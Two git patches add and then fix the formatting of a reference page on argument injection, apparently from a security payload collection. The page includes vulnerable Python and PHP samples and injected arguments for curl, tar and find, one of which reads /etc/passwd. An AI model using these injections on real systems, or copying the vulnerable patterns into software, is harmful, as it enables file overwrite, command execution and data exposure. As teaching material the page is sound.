From 69c6ee87c68d7695ba8cbe13bdc7dcc56186777d Mon Sep 17 00:00:00 2001
From: gregory draperi <gregory.draperi@gmail.com>
Date: Thu, 6 Oct 2022 16:56:44 +0200
Subject: [PATCH 1/2] Argument Injection technique

---
 Argument Injection/README.md | 91 ++++++++++++++++++++++++++++++++++++
 1 file changed, 91 insertions(+)
 create mode 100644 Argument Injection/README.md

diff --git a/Argument Injection/README.md b/Argument Injection/README.md
new file mode 100644
index 0000000..04f7ea1
--- /dev/null
+++ b/Argument Injection/README.md	
@@ -0,0 +1,91 @@
+# Argument Injection
+Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
+
+It can happen in different situations, where you can only inject arguments to a command:
+
+- Improper sanitization (regex)
+- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
+- Bash expansion (ex: *)
+
+In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
+```
+from shlex import quote,split
+import sys
+import subprocess
+
+if __name__=="__main__":
+    command = ['curl']
+    command = command + split(sys.argv[1])
+    print(command)
+    r = subprocess.Popen(command)
+```
+It is possible for an attacker to pass several words to abuse options from ```curl``` command
+```
+python python_rce.py "https://www.google.fr -o test.py" 
+```
+We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
+```
+['curl', 'https://www.google.fr', '-o', 'test.py']
+```
+## Summary
+
+* [List of exposed commands](#List of exposed commands)
+  * [TAR](#TAR)
+  * [CURL](#CURL)
+  * [WGET](#WGET)
+* [References](#references)
+
+
+## List of exposed commands
+
+### CURL
+It is possible to abuse ```curl``` through the following options:
+
+```
+ -o, --output <file>        Write to file instead of stdout
+ -O, --remote-name          Write output to a file named as the remote file
+```
+In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
+
+### TAR
+For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
+
+Argument injection can happen into the '''extract''' command:
+```
+--to-command <command>
+--checkpoint=1 --checkpoint-action=exec=<command>
+-T <file> or --files-from <file>
+```
+
+Or in the '''create''' command:
+```
+-I=<program> or -I <program>
+--use-compres-program=<program>
+```
+There are also short options to work without spaces:
+```
+-T<file>
+-I"/path/to/exec"
+```
+
+### FIND
+Find some_file inside /tmp directory.
+```
+$file = "some_file";
+system("find /tmp -iname ".escapeshellcmd($file));
+```
+
+Print /etc/passwd content.
+```
+$file = "sth -or -exec cat /etc/passwd ; -quit";
+system("find /tmp -iname ".escapeshellcmd($file));
+```
+
+
+## References
+
+
+- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
+- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930)
+- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek,  Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
+

From ba9eb30940f17bd0b2fc6b9e416a3ea43de66ee8 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 6 Oct 2022 17:55:16 +0200
Subject: [PATCH 2/2] Fix links

---
 Argument Injection/README.md | 26 ++++++++++++--------------
 1 file changed, 12 insertions(+), 14 deletions(-)

diff --git a/Argument Injection/README.md b/Argument Injection/README.md
index 04f7ea1..acaa3b7 100644
--- a/Argument Injection/README.md	
+++ b/Argument Injection/README.md	
@@ -8,7 +8,7 @@ It can happen in different situations, where you can only inject arguments to a
 - Bash expansion (ex: *)
 
 In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
-```
+```py
 from shlex import quote,split
 import sys
 import subprocess
@@ -20,16 +20,16 @@ if __name__=="__main__":
     r = subprocess.Popen(command)
 ```
 It is possible for an attacker to pass several words to abuse options from ```curl``` command
-```
+```ps1
 python python_rce.py "https://www.google.fr -o test.py" 
 ```
 We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
-```
+```ps1
 ['curl', 'https://www.google.fr', '-o', 'test.py']
 ```
 ## Summary
 
-* [List of exposed commands](#List of exposed commands)
+* [List of exposed commands](#list-of-exposed-commands)
   * [TAR](#TAR)
   * [CURL](#CURL)
   * [WGET](#WGET)
@@ -41,7 +41,7 @@ We can see by printing the command that all the parameters are splited allowing
 ### CURL
 It is possible to abuse ```curl``` through the following options:
 
-```
+```ps1
  -o, --output <file>        Write to file instead of stdout
  -O, --remote-name          Write output to a file named as the remote file
 ```
@@ -51,32 +51,32 @@ In case there is already one option in the command it is possible to inject seve
 For the ```tar``` command it is possible to inject arbitrary arguments in different commands. 
 
 Argument injection can happen into the '''extract''' command:
-```
+```ps1
 --to-command <command>
 --checkpoint=1 --checkpoint-action=exec=<command>
 -T <file> or --files-from <file>
 ```
 
 Or in the '''create''' command:
-```
+```ps1
 -I=<program> or -I <program>
 --use-compres-program=<program>
 ```
 There are also short options to work without spaces:
-```
+```ps1
 -T<file>
 -I"/path/to/exec"
 ```
 
 ### FIND
 Find some_file inside /tmp directory.
-```
+```php
 $file = "some_file";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
 
 Print /etc/passwd content.
-```
+```php
 $file = "sth -or -exec cat /etc/passwd ; -quit";
 system("find /tmp -iname ".escapeshellcmd($file));
 ```
@@ -84,8 +84,6 @@ system("find /tmp -iname ".escapeshellcmd($file));
 
 ## References
 
-
 - [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
-- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930)
-- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek,  Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
-
+- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
+- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek,  Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)